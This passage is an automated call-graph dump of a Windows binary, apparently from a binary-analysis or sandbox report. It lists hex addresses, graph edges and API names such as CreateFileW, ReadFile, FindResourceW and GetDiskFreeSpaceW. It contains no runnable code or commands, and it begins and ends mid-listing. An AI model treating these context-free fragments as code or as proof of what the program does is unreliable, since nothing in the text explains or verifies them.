_wcsicmp 40349->40350 40350->40348 40350->40349 40352 40aa29 6 API calls 40351->40352 40353 40bc26 40352->40353 40353->40287 40355 40b633 ??3@YAXPAX 40354->40355 40356 40cc15 40355->40356 40357 40aa04 ??3@YAXPAX 40356->40357 40358 40cc1d 40357->40358 40420 40b1ab ??3@YAXPAX ??3@YAXPAX 40358->40420 40360 40b7d4 memset CreateFileW 40360->39510 40360->39511 40361->40297 40362->40328 40363->40334 40365 40ab6b 40364->40365 40369 40ab93 40364->40369 40366 40a9ce 4 API calls 40365->40366 40367 40ab74 40366->40367 40368 40ab7c MultiByteToWideChar 40367->40368 40368->40369 40369->40336 40370->40343 40372 40cd7b 40371->40372 40405 40aa29 40372->40405 40374 40cef5 40375 40aa04 ??3@YAXPAX 40374->40375 40376 40cefd 40375->40376 40376->40343 40378 40aa29 6 API calls 40379 40ce1d 40378->40379 40380 40aa29 6 API calls 40379->40380 40381 40ce3e 40380->40381 40382 40ce6a 40381->40382 40413 40abb7 wcslen memmove 40381->40413 40383 40ce9f 40382->40383 40416 40abb7 wcslen memmove 40382->40416 40385 40a8d0 7 API calls 40383->40385 40388 40ceb5 40385->40388 40386 40ce56 40414 40aa71 wcslen 40386->40414 40395 40a8d0 7 API calls 40388->40395 40390 40ce8b 40417 40aa71 wcslen 40390->40417 40392 40ce5e 40415 40abb7 wcslen memmove 40392->40415 40393 40ce93 40418 40abb7 wcslen memmove 40393->40418 40397 40cecb 40395->40397 40419 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 40397->40419 40399 40cedd 40400 40aa04 ??3@YAXPAX 40399->40400 40401 40cee5 40400->40401 40402 40aa04 ??3@YAXPAX 40401->40402 40406 40aa33 40405->40406 40412 40aa63 40405->40412 40407 40aa44 40406->40407 40408 40aa38 wcslen 40406->40408 40409 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 40407->40409 40408->40407 40410 40aa4d 40409->40410 40411 40aa51 memcpy 40410->40411 40410->40412 40411->40412 40412->40374 40412->40378 40413->40386 40414->40392 40415->40382 40416->40390 40417->40393 40418->40383 40419->40399 40420->40360 40421->40315 40422->39571 40423->39579 40433 44def7 40434 44df07 40433->40434 40435 44df00 ??3@YAXPAX 40433->40435 40436 44df17 40434->40436 40437 44df10 ??3@YAXPAX 40434->40437 40435->40434 40438 44df27 40436->40438 40439 44df20 ??3@YAXPAX 40436->40439 40437->40436 40440 44df37 40438->40440 40441 44df30 ??3@YAXPAX 40438->40441 40439->40438 40441->40440 37671 44dea5 37672 44deb5 FreeLibrary 37671->37672 37673 44dec3 37671->37673 37672->37673 40442 40b0b5 ??3@YAXPAX ??3@YAXPAX 40443 4148b6 FindResourceW 40444 4148f9 40443->40444 40445 4148cf SizeofResource 40443->40445 40445->40444 40446 4148e0 LoadResource 40445->40446 40446->40444 40447 4148ee LockResource 40446->40447 40447->40444 40448 441b3f 40458 43a9f6 40448->40458 40450 441b61 40631 4386af memset 40450->40631 40452 44189a 40453 4418e2 40452->40453 40455 442bd4 40452->40455 40456 4418ea 40453->40456 40632 4414a9 12 API calls 40453->40632 40455->40456 40633 441409 memset 40455->40633 40459 43aa20 40458->40459 40460 43aadf 40458->40460 40459->40460 40461 43aa34 memset 40459->40461 40460->40450 40462 43aa56 40461->40462 40463 43aa4d 40461->40463 40634 43a6e7 40462->40634 40642 42c02e memset 40463->40642 40468 43aad3 40644 4169a7 11 API calls 40468->40644 40469 43aaae 40469->40460 40469->40468 40484 43aae5 40469->40484 40470 43ac18 40473 43ac47 40470->40473 40646 42bbd5 memcpy memcpy memcpy memset memcpy 40470->40646 40474 43aca8 40473->40474 40647 438eed 16 API calls 40473->40647 40478 43acd5 40474->40478 40649 4233ae 11 API calls 40474->40649 40477 43ac87 40648 4233c5 16 API calls 40477->40648 40650 423426 11 API calls 40478->40650 40482 43ace1 40651 439811 164 API calls 40482->40651 40483 43a9f6 162 API calls 40483->40484 40484->40460 40484->40470 40484->40483 40645 439bbb 22 API calls 40484->40645 40486 43acfd 40491 43ad2c 40486->40491 40652 438eed 16 API calls 40486->40652 40488 43ad19 40653 4233c5 16 API calls 40488->40653 40490 43ad58 40654 44081d 164 API calls 40490->40654 40491->40490 40494 43add9 40491->40494 40658 423426 11 API calls 40494->40658 40495 43ae3a memset 40496 43ae73 40495->40496 40659 42e1c0 148 API calls 40496->40659 40497 43adab 40656 438c4e 164 API calls 40497->40656 40498 43ad6c 40498->40460 40498->40497 40655 42370b memset memcpy memset 40498->40655 40502 43adcc 40657 440f84 12 API calls 40502->40657 40503 43ae96 40660 42e1c0 148 API calls 40503->40660 40506 43aea8 40507 43aec1 40506->40507 40661 42e199 148 API calls 40506->40661 40508 43af00 40507->40508 40662 42e1c0 148 API calls 40507->40662 40508->40460 40512 43af1a 40508->40512 40513 43b3d9 40508->40513 40663 438eed 16 API calls 40512->40663 40518 43b3f6 40513->40518 40519 43b4c8 40513->40519 40514 43b60f 40514->40460 40722 4393a5 17 API calls 40514->40722 40517 43af2f 40664 4233c5 16 API calls 40517->40664 40704 432878 12 API calls 40518->40704 40523 43b4f2 40519->40523 40710 42bbd5 memcpy memcpy memcpy memset memcpy 40519->40710 40521 43af51 40665 423426 11 API calls 40521->40665 40711 43a76c 21 API calls 40523->40711 40525 43af7d 40666 423426 11 API calls 40525->40666 40529 43b529 40712 44081d 164 API calls 40529->40712 40530 43b462 40706 423330 11 API calls 40530->40706 40531 43af94 40667 423330 11 API calls 40531->40667 40535 43afca 40668 423330 11 API calls 40535->40668 40536 43b47e 40540 43b497 40536->40540 40707 42374a memcpy memset memcpy memcpy memcpy 40536->40707 40537 43b544 40541 43b55c 40537->40541 40713 42c02e memset 40537->40713 40538 43b428 40538->40530 40705 432b60 16 API calls 40538->40705 40708 4233ae 11 API calls 40540->40708 40714 43a87a 164 API calls 40541->40714 40543 43afdb 40669 4233ae 11 API calls 40543->40669 40548 43b56c 40552 43b58a 40548->40552 40715 423330 11 API calls 40548->40715 40549 43b4b1 40709 423399 11 API calls 40549->40709 40551 43afee 40670 44081d 164 API calls 40551->40670 40716 440f84 12 API calls 40552->40716 40553 43b4c1 40718 42db80 164 API calls 40553->40718 40558 43b592 40717 43a82f 16 API calls 40558->40717 40561 43b5b4 40719 438c4e 164 API calls 40561->40719 40563 43b5cf 40720 42c02e memset 40563->40720 40565 43b005 40565->40460 40569 43b01f 40565->40569 40671 42d836 164 API calls 40565->40671 40566 43b1ef 40681 4233c5 16 API calls 40566->40681 40569->40566 40679 423330 11 API calls 40569->40679 40680 42d71d 164 API calls 40569->40680 40570 43b212 40682 423330 11 API calls 40570->40682 40572 43b087 40672 4233ae 11 API calls 40572->40672 40573 43add4 40573->40514 40721 438f86 16 API calls 40573->40721 40576 43b22a 40683 42ccb5 11 API calls 40576->40683 40579 43b23f 40684 4233ae 11 API calls 40579->40684 40580 43b10f 40675 423330 11 API calls 40580->40675 40582 43b257 40685 4233ae 11 API calls 40582->40685 40586 43b129 40676 4233ae 11 API calls 40586->40676 40587 43b26e 40686 4233ae 11 API calls 40587->40686 40590 43b09a 40590->40580 40673 42cc15 19 API calls 40590->40673 40674 4233ae 11 API calls 40590->40674 40591 43b282 40687 43a87a 164 API calls 40591->40687 40593 43b13c 40677 440f84 12 API calls 40593->40677 40595 43b29d 40688 423330 11 API calls 40595->40688 40598 43b15f 40678 4233ae 11 API calls 40598->40678 40599 43b2af 40600 43b2b8 40599->40600 40601 43b2ce 40599->40601 40689 4233ae 11 API calls 40600->40689 40690 440f84 12 API calls 40601->40690 40605 43b2c9 40692 4233ae 11 API calls 40605->40692 40606 43b2da 40691 42370b memset memcpy memset 40606->40691 40609 43b2f9 40693 423330 11 API calls 40609->40693 40611 43b30b 40694 423330 11 API calls 40611->40694 40613 43b325 40695 423399 11 API calls 40613->40695 40615 43b332 40696 4233ae 11 API calls 40615->40696 40617 43b354 40697 423399 11 API calls 40617->40697 40619 43b364 40698 43a82f 16 API calls 40619->40698 40621 43b370 40699 42db80 164 API calls 40621->40699 40623 43b380 40700 438c4e 164 API calls 40623->40700 40625 43b39e 40701 423399 11 API calls 40625->40701 40627 43b3ae 40702 43a76c 21 API calls 40627->40702 40629 43b3c3 40703 423399 11 API calls 40629->40703 40631->40452 40632->40456 40633->40455 40635 43a6f5 40634->40635 40638 43a765 40634->40638 40635->40638 40723 42a115 40635->40723 40638->40460 40643 4397fd memset 40638->40643 40640 43a73d 40640->40638 40641 42a115 148 API calls 40640->40641 40641->40638 40642->40462 40643->40469 40644->40460 40645->40484 40646->40473 40647->40477 40648->40474 40649->40478 40650->40482 40651->40486 40652->40488 40653->40491 40654->40498 40655->40497 40656->40502 40657->40573 40658->40495 40659->40503 40660->40506 40661->40507 40662->40507 40663->40517 40664->40521 40665->40525 40666->40531 40667->40535 40668->40543 40669->40551 40670->40565 40671->40572 40672->40590 40673->40590 40674->40590 40675->40586 40676->40593 40677->40598 40678->40569 40679->40569 40680->40569 40681->40570 40682->40576 40683->40579 40684->40582 40685->40587 40686->40591 40687->40595 40688->40599 40689->40605 40690->40606 40691->40605 40692->40609 40693->40611 40694->40613 40695->40615 40696->40617 40697->40619 40698->40621 40699->40623 40700->40625 40701->40627 40702->40629 40703->40573 40704->40538 40705->40530 40706->40536 40707->40540 40708->40549 40709->40553 40710->40523 40711->40529 40712->40537 40713->40541 40714->40548 40715->40552 40716->40558 40717->40553 40718->40561 40719->40563 40720->40573 40721->40514 40722->40460 40724 42a175 40723->40724 40726 42a122 40723->40726 40724->40638 40729 42b13b 148 API calls 40724->40729 40726->40724 40727 42a115 148 API calls 40726->40727 40730 43a174 40726->40730 40754 42a0a8 148 API calls 40726->40754 40727->40726 40729->40640 40744 43a196 40730->40744 40745 43a19e 40730->40745 40731 43a306 40731->40744 40763 4388c4 14 API calls 40731->40763 40734 42a115 148 API calls 40734->40745 40735 415a91 memset 40735->40745 40736 43a642 40736->40744 40777 4169a7 11 API calls 40736->40777 40738 4165ff 11 API calls 40738->40745 40740 43a635 40776 42c02e memset 40740->40776 40744->40726 40745->40731 40745->40734 40745->40735 40745->40738 40745->40744 40755 42ff8c 40745->40755 40771 439504 13 API calls 40745->40771 40772 4312d0 148 API calls 40745->40772 40773 42be4c memcpy memcpy memcpy memset memcpy 40745->40773 40774 43a121 11 API calls 40745->40774 40747 43a325 40747->40736 40747->40740 40747->40744 40748 4169a7 11 API calls 40747->40748 40749 42b5b5 memset memcpy 40747->40749 40750 42bf4c 14 API calls 40747->40750 40753 4165ff 11 API calls 40747->40753 40764 42b63e 40747->40764 40775 42bfcf memcpy 40747->40775 40748->40747 40749->40747 40750->40747 40753->40747 40754->40726 40756 43817e 140 API calls 40755->40756 40758 42ff99 40756->40758 40757 42ff9d 40757->40745 40758->40757 40759 42ffe3 40758->40759 40760 42ffd0 40758->40760 40779 4169a7 11 API calls 40759->40779 40778 4169a7 11 API calls 40760->40778 40763->40747 40780 42b4ec 40764->40780 40766 42b64c 40786 42b5e4 memset 40766->40786 40768 42b65e 40769 42b66d 40768->40769 40787 42b3c6 11 API calls 40768->40787 40769->40747 40771->40745 40772->40745 40773->40745 40774->40745 40775->40747 40776->40736 40777->40744 40778->40757 40779->40757 40781 42b4ff 40780->40781 40782 415a91 memset 40781->40782 40783 42b52c 40782->40783 40784 42b553 memcpy 40783->40784 40785 42b545 40783->40785 40784->40785 40785->40766 40786->40768 40787->40769 40807 41493c EnumResourceNamesW 37675 4287c1 37676 4287d2 37675->37676 37677 429ac1 37675->37677 37678 428818 37676->37678 37679 42881f 37676->37679 37700 425711 37676->37700 37689 425ad6 37677->37689 37745 415c56 11 API calls 37677->37745 37712 42013a 37678->37712 37740 420244 97 API calls 37679->37740 37684 4260dd 37739 424251 120 API calls 37684->37739 37686 4259da 37738 416760 11 API calls 37686->37738 37692 422aeb memset memcpy memcpy 37692->37700 37693 429a4d 37694 429a66 37693->37694 37698 429a9b 37693->37698 37741 415c56 11 API calls 37694->37741 37696 4260a1 37737 415c56 11 API calls 37696->37737 37699 429a96 37698->37699 37743 416760 11 API calls 37698->37743 37744 424251 120 API calls 37699->37744 37700->37677 37700->37686 37700->37692 37700->37693 37700->37696 37708 4259c2 37700->37708 37711 425a38 37700->37711 37728 4227f0 memset memcpy 37700->37728 37729 422b84 15 API calls 37700->37729 37730 422b5d memset memcpy memcpy 37700->37730 37731 422640 13 API calls 37700->37731 37733 4241fc 11 API calls 37700->37733 37734 42413a 90 API calls 37700->37734 37703 429a7a 37742 416760 11 API calls 37703->37742 37708->37689 37732 415c56 11 API calls 37708->37732 37711->37708 37735 422640 13 API calls 37711->37735 37736 4226e0 12 API calls 37711->37736 37713 42014c 37712->37713 37716 420151 37712->37716 37755 41e466 97 API calls 37713->37755 37715 420162 37715->37700 37716->37715 37717 4201b3 37716->37717 37718 420229 37716->37718 37719 4201b8 37717->37719 37720 4201dc 37717->37720 37718->37715 37721 41fd5e 86 API calls 37718->37721 37746 41fbdb 37719->37746 37720->37715 37724 4201ff 37720->37724 37752 41fc4c 37720->37752 37721->37715 37724->37715 37727 42013a 97 API calls 37724->37727 37727->37715 37728->37700 37729->37700 37730->37700 37731->37700 37732->37686 37733->37700 37734->37700 37735->37711 37736->37711 37737->37686 37738->37684 37739->37689 37740->37700 37741->37703 37742->37699 37743->37699 37744->37677 37745->37686 37747 41fbf8 37746->37747 37750 41fbf1 37746->37750 37760 41ee26 37747->37760 37751 41fc39 37750->37751 37770 4446ce 11 API calls 37750->37770 37751->37715 37756 41fd5e 37751->37756 37753 41ee6b 86 API calls 37752->37753 37754 41fc5d 37753->37754 37754->37720 37755->37716 37758 41fd65 37756->37758 37757 41fdab 37757->37715 37758->37757 37759 41fbdb 86 API calls 37758->37759 37759->37758 37761 41ee41 37760->37761 37762 41ee32 37760->37762 37771 41edad 37761->37771 37774 4446ce 11 API calls 37762->37774 37765 41ee3c 37765->37750 37768 41ee58 37768->37765 37776 41ee6b 37768->37776 37770->37751 37780 41be52 37771->37780 37774->37765 37775 41eb85 11 API calls 37775->37768 37777 41ee70 37776->37777 37778 41ee78 37776->37778 37836 41bf99 86 API calls 37777->37836 37778->37765 37781 41be6f 37780->37781 37782 41be5f 37780->37782 37788 41be8c 37781->37788 37801 418c63 37781->37801 37815 4446ce 11 API calls 37782->37815 37785 41be69 37785->37765 37785->37775 37786 41bee7 37786->37785 37819 41a453 86 API calls 37786->37819 37788->37785 37788->37786 37789 41bf3a 37788->37789 37793 41bed1 37788->37793 37818 4446ce 11 API calls 37789->37818 37791 41bef0 37791->37786 37792 41bf01 37791->37792 37794 41bf24 memset 37792->37794 37796 41bf14 37792->37796 37816 418a6d memset memcpy memset 37792->37816 37793->37791 37795 41bee2 37793->37795 37794->37785 37805 41ac13 37795->37805 37817 41a223 memset memcpy memset 37796->37817 37800 41bf20 37800->37794 37804 418c72 37801->37804 37802 418c94 37802->37788 37803 418d51 memset memset 37803->37802 37804->37802 37804->37803 37806 41ac52 37805->37806 37807 41ac3f memset 37805->37807 37810 41ac6a 37806->37810 37820 41dc14 19 API calls 37806->37820 37808 41acd9 37807->37808 37808->37786 37812 41aca1 37810->37812 37821 41519d 37810->37821 37812->37808 37813 41acc0 memset 37812->37813 37814 41accd memcpy 37812->37814 37813->37808 37814->37808 37815->37785 37816->37796 37817->37800 37818->37786 37820->37810 37824 4175ed 37821->37824 37832 417570 SetFilePointer 37824->37832 37827 41760a ReadFile 37828 417637 37827->37828 37829 417627 GetLastError 37827->37829 37830 4151b3 37828->37830 37831 41763e memset 37828->37831 37829->37830 37830->37812 37831->37830 37833 4175b2 37832->37833 37834 41759c GetLastError 37832->37834 37833->37827 37833->37830 37834->37833 37835 4175a8 GetLastError 37834->37835 37835->37833 37836->37778 37837 417bc5 37839 417c61 37837->37839 37843 417bda 37837->37843 37838 417bf6 UnmapViewOfFile CloseHandle 37838->37838 37838->37843 37841 417c2c 37841->37843 37849 41851e 20 API calls 37841->37849 37843->37838 37843->37839 37843->37841 37844 4175b7 37843->37844 37845 4175d6 FindCloseChangeNotification 37844->37845 37846 4175c8 37845->37846 37847 4175df 37845->37847 37846->37847 37848 4175ce Sleep 37846->37848 37847->37843 37848->37845 37849->37841 37881 4415ea 37889 4304b2 37881->37889 37883 4415fe 37884 4418ea 37883->37884 37885 442bd4 37883->37885 37886 4418e2 37883->37886 37885->37884 37937 441409 memset 37885->37937 37886->37884 37936 4414a9 12 API calls 37886->37936 37938 43041c 12 API calls 37889->37938 37891 4304cd 37896 430557 37891->37896 37939 43034a 37891->37939 37893 4304f3 37893->37896 37943 430468 11 API calls 37893->37943 37895 430506 37895->37896 37897 43057b 37895->37897 37944 43817e 37895->37944 37896->37883 37949 415a91 37897->37949 37902 4305e4 37902->37896 37954 4328e4 12 API calls 37902->37954 37904 43052d 37904->37896 37904->37897 37907 430542 37904->37907 37906 4305fa 37908 430609 37906->37908 37955 423383 11 API calls 37906->37955 37907->37896 37948 4169a7 11 API calls 37907->37948 37956 423330 11 API calls 37908->37956 37911 430634 37957 423399 11 API calls 37911->37957 37913 430648 37958 4233ae 11 API calls 37913->37958 37915 43066b 37959 423330 11 API calls 37915->37959 37917 43067d 37960 4233ae 11 API calls 37917->37960 37919 430695 37961 423330 11 API calls 37919->37961 37921 4306d6 37963 423330 11 API calls 37921->37963 37922 4306a7 37922->37921 37924 4306c0 37922->37924 37962 4233ae 11 API calls 37924->37962 37925 4306d1 37964 430369 17 API calls 37925->37964 37928 4306f3 37965 423330 11 API calls 37928->37965 37930 430704 37966 423330 11 API calls 37930->37966 37932 430710 37967 423330 11 API calls 37932->37967 37934 43071e 37968 423383 11 API calls 37934->37968 37936->37884 37937->37885 37938->37891 37940 43034e 37939->37940 37942 430359 37939->37942 37969 415c23 memcpy 37940->37969 37942->37893 37943->37895 37945 438187 37944->37945 37947 438192 37944->37947 37970 4380f6 37945->37970 37947->37904 37948->37896 37950 415a9d 37949->37950 37951 415ab3 37950->37951 37952 415aa4 memset 37950->37952 37951->37896 37953 4397fd memset 37951->37953 37952->37951 37953->37902 37954->37906 37955->37908 37956->37911 37957->37913 37958->37915 37959->37917 37960->37919 37961->37922 37962->37925 37963->37925 37964->37928 37965->37930 37966->37932 37967->37934 37968->37896 37969->37942 37972 43811f 37970->37972 37971 438164 37971->37947 37972->37971 37975 437e5e 37972->37975 37998 4300e8 37972->37998 38006 437d3c 37975->38006 37977 437eb3 37977->37972 37978 437ea9 37978->37977 37983 437f22 37978->37983 38021 41f432 37978->38021 37981 437f06 38072 415c56 11 API calls 37981->38072 37985 437f7f 37983->37985 38073 432d4e 37983->38073 37984 437f95 38077 415c56 11 API calls 37984->38077 37985->37984 37988 43802b 37985->37988 38032 4165ff 37988->38032 37993 43806b 37994 438094 37993->37994 38078 42f50e 139 API calls 37993->38078 37996 437fa3 37994->37996 37997 4300e8 3 API calls 37994->37997 37996->37977 38079 41f638 104 API calls 37996->38079 37997->37996 37999 430128 37998->37999 38002 4300fa 37998->38002 38001 430196 memset 37999->38001 38003 4301bc 38001->38003 38005 4301de 38001->38005 38002->37999 38002->38005 38516 432f8c 38002->38516 38004 4301c9 memcpy 38003->38004 38003->38005 38004->38005 38005->37972 38007 437d69 38006->38007 38010 437d80 38006->38010 38092 437ccb 11 API calls 38007->38092 38009 437d76 38009->37978 38010->38009 38011 437da3 38010->38011 38013 437d90 38010->38013 38080 438460 38011->38080 38013->38009 38096 437ccb 11 API calls 38013->38096 38015 437de8 38095 424f26 123 API calls 38015->38095 38017 437dcb 38017->38015 38093 444283 13 API calls 38017->38093 38019 437dfc 38094 437ccb 11 API calls 38019->38094 38022 41f54d 38021->38022 38028 41f44f 38021->38028 38023 41f466 38022->38023 38290 41c635 memset memset 38022->38290 38023->37981 38023->37983 38028->38023 38030 41f50b 38028->38030 38261 41f1a5 38028->38261 38286 41c06f memcmp 38028->38286 38287 41f3b1 90 API calls 38028->38287 38288 41f398 86 API calls 38028->38288 38030->38022 38030->38023 38289 41c295 86 API calls 38030->38289 38033 4165a0 11 API calls 38032->38033 38034 41660d 38033->38034 38035 437371 38034->38035 38036 41703f 11 API calls 38035->38036 38037 437399 38036->38037 38038 43739d 38037->38038 38040 4373ac 38037->38040 38396 4446ea 11 API calls 38038->38396 38041 416935 16 API calls 38040->38041 38042 4373ca 38041->38042 38043 438460 134 API calls 38042->38043 38052 415a91 memset 38042->38052 38055 43758f 38042->38055 38067 437584 38042->38067 38071 437d3c 135 API calls 38042->38071 38377 4251c4 38042->38377 38395 415304 ??3@YAXPAX 38042->38395 38397 425433 13 API calls 38042->38397 38398 425413 38042->38398 38405 42533e 38042->38405 38409 42538f 38042->38409 38413 42453e 123 API calls 38042->38413 38043->38042 38044 4375bc 38046 415c7d 16 API calls 38044->38046 38047 4375d2 38046->38047 38069 4373a7 38047->38069 38416 4442e6 38047->38416 38050 4375e2 38050->38069 38423 444283 13 API calls 38050->38423 38052->38042 38414 42453e 123 API calls 38055->38414 38058 4375f4 38061 437620 38058->38061 38062 43760b 38058->38062 38060 43759f 38063 416935 16 API calls 38060->38063 38065 416935 16 API calls 38061->38065 38424 444283 13 API calls 38062->38424 38063->38067 38065->38069 38067->38044 38415 42453e 123 API calls 38067->38415 38068 437612 memcpy 38068->38069 38069->37993 38071->38042 38072->37977 38074 432d65 38073->38074 38075 432d58 38073->38075 38074->37985 38515 432cc4 memset memset memcpy 38075->38515 38077->37996 38078->37994 38079->37977 38097 41703f 38080->38097 38082 43847a 38083 43848a 38082->38083 38084 43847e 38082->38084 38104 438270 38083->38104 38134 4446ea 11 API calls 38084->38134 38088 438488 38088->38017 38090 4384bb 38091 438270 134 API calls 38090->38091 38091->38088 38092->38009 38093->38019 38094->38015 38095->38009 38096->38009 38098 417044 38097->38098 38099 41705c 38097->38099 38103 417055 38098->38103 38136 416760 11 API calls 38098->38136 38100 417075 38099->38100 38137 41707a 38099->38137 38100->38082 38103->38082 38105 415a91 memset 38104->38105 38106 43828d 38105->38106 38107 438297 38106->38107 38108 438341 38106->38108 38110 4382d6 38106->38110 38109 415c7d 16 API calls 38107->38109 38143 44358f 38108->38143 38112 438458 38109->38112 38113 4382fb 38110->38113 38114 4382db 38110->38114 38112->38088 38135 424f26 123 API calls 38112->38135 38186 415c23 memcpy 38113->38186 38174 416935 38114->38174 38117 438305 38121 44358f 19 API calls 38117->38121 38123 438318 38117->38123 38118 4382e9 38182 415c7d 38118->38182 38120 438373 38124 4300e8 3 API calls 38120->38124 38127 438383 38120->38127 38121->38123 38123->38120 38169 43819e 38123->38169 38124->38127 38125 4383f5 38130 438404 38125->38130 38131 43841c 38125->38131 38126 4383cd 38126->38125 38188 42453e 123 API calls 38126->38188 38127->38126 38187 415c23 memcpy 38127->38187 38133 416935 16 API calls 38130->38133 38132 416935 16 API calls 38131->38132 38132->38107 38133->38107 38134->38088 38135->38090 38136->38103 38138 417085 38137->38138 38139 4170ab 38137->38139 38138->38139 38142 416760 11 API calls 38138->38142 38139->38098 38141 4170a4 38141->38098 38142->38141 38144 4435be 38143->38144 38145 443676 38144->38145 38150 4436ce 38144->38150 38153 44366c 38144->38153 38167 44360c 38144->38167 38189 442ff8 38144->38189 38146 443758 38145->38146 38149 442ff8 19 API calls 38145->38149 38152 443737 38145->38152 38158 443775 38146->38158 38198 441409 memset 38146->38198 38148 442ff8 19 API calls 38148->38146 38149->38152 38155 4165ff 11 API calls 38150->38155 38152->38148 38197 4169a7 11 API calls 38153->38197 38154 4437be 38159 4437de 38154->38159 38200 416760 11 API calls 38154->38200 38155->38145 38158->38154 38199 415c56 11 API calls 38158->38199 38161 443801 38159->38161 38201 42463b memset memcpy 38159->38201 38160 443826 38212 43bd08 memset 38160->38212 38161->38160 38202 43024d 38161->38202 38166 443837 38166->38167 38168 43024d memset 38166->38168 38167->38123 38168->38166 38170 438246 38169->38170 38172 4381ba 38169->38172 38170->38120 38171 41f432 110 API calls 38171->38172 38172->38170 38172->38171 38239 41f638 104 API calls 38172->38239 38175 41693e 38174->38175 38177 41698e 38174->38177 38178 41694c 38175->38178 38240 422fd1 memset 38175->38240 38177->38118 38178->38177 38241 4165a0 38178->38241 38183 415c81 38182->38183 38185 415c9c 38182->38185 38184 416935 16 API calls 38183->38184 38183->38185 38184->38185 38185->38107 38186->38117 38187->38126 38188->38125 38195 442ffe 38189->38195 38190 443094 38227 4414a9 12 API calls 38190->38227 38192 443092 38192->38144 38195->38190 38195->38192 38213 4414ff 38195->38213 38225 4169a7 11 API calls 38195->38225 38226 441325 memset 38195->38226 38197->38145 38198->38146 38199->38154 38200->38159 38201->38161 38203 4302f9 38202->38203 38208 43025c 38202->38208 38203->38160 38204 4302cd 38228 435ef3 38204->38228 38208->38203 38208->38204 38237 4172c8 memset 38208->38237 38210 4302dc 38238 4386af memset 38210->38238 38212->38166 38214 441539 38213->38214 38216 441547 38213->38216 38215 441575 38214->38215 38214->38216 38217 441582 38214->38217 38219 42fccf 18 API calls 38215->38219 38218 4418e2 38216->38218 38222 442bd4 38216->38222 38220 43275a 12 API calls 38217->38220 38221 4414a9 12 API calls 38218->38221 38223 4418ea 38218->38223 38219->38216 38220->38216 38221->38223 38222->38223 38224 441409 memset 38222->38224 38223->38195 38224->38222 38225->38195 38226->38195 38227->38192 38230 435f03 38228->38230 38232 4302d4 38228->38232 38229 435533 memset 38229->38230 38230->38229 38231 4172c8 memset 38230->38231 38230->38232 38231->38230 38233 4301e7 38232->38233 38234 43023c 38233->38234 38236 4301f5 38233->38236 38234->38210 38235 42b896 memset 38235->38236 38236->38234 38236->38235 38237->38208 38238->38203 38239->38172 38240->38178 38247 415cfe 38241->38247 38246 422b84 15 API calls 38246->38177 38252 415d23 38247->38252 38254 41628e 38247->38254 38248 4163ca 38249 416422 10 API calls 38248->38249 38249->38254 38250 416422 10 API calls 38250->38252 38251 416172 memset 38251->38252 38252->38248 38252->38250 38252->38251 38253 415cb9 10 API calls 38252->38253 38252->38254 38253->38252 38255 416520 38254->38255 38256 416527 38255->38256 38260 416574 38255->38260 38257 415700 10 API calls 38256->38257 38258 416544 38256->38258 38256->38260 38257->38258 38259 416561 memcpy 38258->38259 38258->38260 38259->38260 38260->38177 38260->38246 38291 41bc3b 38261->38291 38264 41edad 86 API calls 38265 41f1cb 38264->38265 38266 41f1f5 memcmp 38265->38266 38267 41f20e 38265->38267 38271 41f282 38265->38271 38266->38267 38268 41f21b memcmp 38267->38268 38267->38271 38269 41f326 38268->38269 38272 41f23d 38268->38272 38270 41ee6b 86 API calls 38269->38270 38269->38271 38270->38271 38271->38028 38272->38269 38273 41f28e memcmp 38272->38273 38315 41c8df 56 API calls 38272->38315 38273->38269 38274 41f2a9 38273->38274 38274->38269 38277 41f308 38274->38277 38278 41f2d8 38274->38278 38276 41f269 38276->38269 38279 41f287 38276->38279 38280 41f27a 38276->38280 38277->38269 38317 4446ce 11 API calls 38277->38317 38281 41ee6b 86 API calls 38278->38281 38279->38273 38282 41ee6b 86 API calls 38280->38282 38283 41f2e0 38281->38283 38282->38271 38316 41b1ca memset 38283->38316 38286->38028 38287->38028 38288->38028 38289->38022 38290->38023 38292 41bc54 38291->38292 38300 41be0b 38291->38300 38294 41bd61 38292->38294 38292->38300 38304 41bc8d 38292->38304 38318 41baf0 55 API calls 38292->38318 38296 41be45 38294->38296 38327 41a25f memset 38294->38327 38296->38264 38296->38271 38298 41be04 38325 41aee4 56 API calls 38298->38325 38300->38294 38326 41ae17 34 API calls 38300->38326 38301 41bd42 38301->38294 38301->38298 38302 41bdd8 memset 38301->38302 38303 41bdba 38301->38303 38305 41bde7 memcmp 38302->38305 38314 4175ed 6 API calls 38303->38314 38304->38294 38304->38301 38306 41bd18 38304->38306 38319 4151e3 38304->38319 38305->38298 38308 41bdfd 38305->38308 38306->38294 38306->38301 38323 41a9da 86 API calls 38306->38323 38307 41bdcc 38307->38294 38307->38305 38324 41a1b0 memset 38308->38324 38314->38307 38315->38276 38316->38271 38317->38269 38318->38304 38328 41837f 38319->38328 38322 444706 11 API calls 38322->38306 38323->38301 38324->38298 38325->38300 38326->38294 38327->38296 38329 4183c1 38328->38329 38330 4183ca 38328->38330 38375 418197 25 API calls 38329->38375 38333 4151f9 38330->38333 38349 418160 38330->38349 38333->38306 38333->38322 38334 4183e5 38334->38333 38358 41739b 38334->38358 38337 418444 CreateFileW 38339 418477 38337->38339 38338 41845f CreateFileA 38338->38339 38340 4184c2 memset 38339->38340 38341 41847e GetLastError ??3@YAXPAX 38339->38341 38361 418758 38340->38361 38342 4184b5 38341->38342 38343 418497 38341->38343 38376 444706 11 API calls 38342->38376 38345 41837f 49 API calls 38343->38345 38345->38333 38350 41739b GetVersionExW 38349->38350 38351 418165 38350->38351 38353 4173e4 MultiByteToWideChar malloc MultiByteToWideChar ??3@YAXPAX 38351->38353 38354 418178 38353->38354 38355 41817f 38354->38355 38356 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte ??3@YAXPAX 38354->38356 38355->38334 38357 418188 ??3@YAXPAX 38356->38357 38357->38334 38359 4173d6 38358->38359 38360 4173ad GetVersionExW 38358->38360 38359->38337 38359->38338 38360->38359 38362 418680 43 API calls 38361->38362 38363 418782 38362->38363 38364 418506 ??3@YAXPAX 38363->38364 38365 418160 11 API calls 38363->38365 38364->38333 38366 418799 38365->38366 38366->38364 38367 41739b GetVersionExW 38366->38367 38368 4187a7 38367->38368 38369 4187da 38368->38369 38370 4187ad GetDiskFreeSpaceW 38368->38370 38372 4187ec GetDiskFreeSpaceA 38369->38372 38374 4187e8 38369->38374 38373 418800 ??3@YAXPAX 38370->38373 38372->38373 38373->38364 38374->38372 38375->38330 38376->38333 38425 424f07 38377->38425 38379 4251e4 38380 4251f7 38379->38380 38381 4251e8 38379->38381 38433 4250f8 38380->38433 38432 